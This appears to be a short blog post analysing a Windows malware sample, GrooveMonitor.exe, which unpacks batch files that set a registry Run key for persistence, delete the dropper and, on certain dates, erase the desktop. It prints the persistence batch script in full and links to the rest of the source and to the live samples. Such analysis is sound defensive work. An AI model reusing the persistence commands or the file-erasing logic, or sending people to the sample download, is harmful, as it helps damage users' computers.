Although first thought as another serious country level virus, further, deeper analysis show that it is relatively simple attack.
GrooveMonitor.exe is the main file.
Checking the file with a Hex Editor we notice something nice.
Basically its a self extracting RAR file.
Opening the archive we see 3 more files, jucheck.exe, juboot.exe and SLEEP.EXE.
If we look at juboot.exe in a hex editor we find the following signature
The header belongs to "the Ultimate Packer for eXecutables" (http://upx.sourceforge.net).
I then opened the file with PE Explorer allowing me to see that the file is basically a Bat file with the following content:
@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
start "" /D"%systemroot%\system32\" "jucheck.exe"
It looks like justboot.exe runs sleep for 2 and then adds registry keys ensuring that 'jucheck.exe' is executed each time the computer starts up.
In the same manner, checking jucheck.exe, it is also a batch file.
The batch file is longer this time so I'll summarize it for you. I made the source is available on pastebin, http://pastebin.com/B2jKHUDH .
First sleep for 2 just like with the juboot.exe
then it deletes the juboot.exe file and the original GrooveMonitor.exe
The code then checks for specific dates to run. the dates are:
The batch then moves on and attempts to erase the desktop in the same way.
Finally, the batch file runs "calc" (Where did this come from ?).
I haven't finished messing with the samples but as you've seen its not a sophisticated attack and will be easy to detect and stop before any damage is done.
If you want to look at the samples for yourselves, I've made them available at http://turbobit.net/aywxvv08e83b.html